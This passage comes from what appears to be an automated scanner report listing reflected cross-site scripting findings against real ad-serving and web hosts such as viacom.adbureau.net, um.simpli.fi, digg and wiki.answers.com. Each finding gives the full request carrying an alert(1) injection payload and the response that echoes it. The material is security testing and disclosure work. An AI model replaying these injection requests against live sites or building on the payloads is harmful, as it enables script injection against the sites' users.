Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:15 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338d48e9'-alert(1)-'8fc60c96206&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.482. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53444'-alert(1)-'085db14bc75 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match53444'-alert(1)-'085db14bc75 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:15 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match53444'-alert(1)-'085db14bc75?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.483. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1407'%3balert(1)//6b06bfedd3b was submitted in the REST URL parameter 2. This input was echoed as d1407';alert(1)//6b06bfedd3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFTRSERVER/hserverd1407'%3balert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS21
Content-Type: text/html
Content-Length: 2332
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000d1407';alert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent
...[SNIP]...

3.484. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52531'%3balert(1)//e133daf0ee1 was submitted in the REST URL parameter 3. This input was echoed as 52531';alert(1)//e133daf0ee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFTRSERVER/hserver//height52531'%3balert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS25
Content-Type: text/html
Content-Length: 2332
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height52531';alert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload
...[SNIP]...

3.485. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f655b'%3balert(1)//9025d8e1577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f655b';alert(1)//9025d8e1577 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b'%3balert(1)//9025d8e1577=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS17
Content-Type: text/html
Content-Length: 2335
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543?f655b'%3balert(1); expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b';alert(1)//9025d8e1577=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.486. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b4dd'%3balert(1)//9cd18a86ff4 was submitted in the REST URL parameter 1. This input was echoed as 8b4dd';alert(1)//9cd18a86ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver8b4dd'%3balert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 2310
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5235,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=0000147300000000000000008b4dd';alert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5235';



...[SNIP]...

3.487. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6779'%3balert(1)//985a6732d77 was submitted in the REST URL parameter 2. This input was echoed as e6779';alert(1)//985a6732d77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/heighte6779'%3balert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 9999
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload1027,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
equiredVersion);\r\n}\r\n}\r\n}\r\ndetectPluginTFR1301674168897();\r\nvar _TFR1301674168897_Instance =\r\n{\r\nclick : \"http://viacom.adbureau.net/accipiter/adclick/CID=000004030000000000000000/heighte6779';alert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1/relocate=\",\r\nclickThruUrl: \"http://clk.atdmt.com/go/mtvnsdrv0010001160apm/direct;wi.300;hi.250;ai.204747641.208196969;ct.$num$/01/\",\r
...[SNIP]...

3.488. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56888'%3balert(1)//4857672fae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56888';alert(1)//4857672fae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888'%3balert(1)//4857672fae1=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2858
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload1027,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
empStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000004030000000000000000/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888';alert(1)//4857672fae1=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload1027';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.489. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10202'%3balert(1)//4440355789c was submitted in the REST URL parameter 1. This input was echoed as 10202';alert(1)//4440355789c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver10202'%3balert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2306
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac000000000000000010202';alert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';



...[SNIP]...

3.490. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac12'%3balert(1)//af0eabc09d9 was submitted in the REST URL parameter 2. This input was echoed as cac12';alert(1)//af0eabc09d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/heightcac12'%3balert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS25
Content-Type: text/html
Content-Length: 2306
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
Str = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/heightcac12';alert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try
...[SNIP]...

3.491. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400d4'%3balert(1)//32c671dbab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 400d4';alert(1)//32c671dbab7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4'%3balert(1)//32c671dbab7=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS15
Content-Type: text/html
Content-Length: 2309
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
(tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4';alert(1)//32c671dbab7=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.492. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 42d87<script>alert(1)</script>f6b106d7236 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/examples/html/xss-wwwviglinkcom-cross-site-scripting.html42d87<script>alert(1)</script>f6b106d7236 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 18 Apr 2011 23:57:24 GMT
Via: NS-CACHE: 100
Etag: "a7c33c46a8e872caaf6e3118f6a7b12aa7665a38"
Content-Length: 157
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 19 Apr 2011 00:07:23 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/examples/html/xss-wwwviglinkcom-cross-site-scripting.html42d87<script>alert(1)</script>f6b106d7236", "diggs": 0});

3.493. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b4"><script>alert(1)</script>3af2ec5fc61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:06 GMT
X-Varnish: 519896922
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 77504


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp" target="_top">
...[SNIP]...

3.494. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 2]

Summary
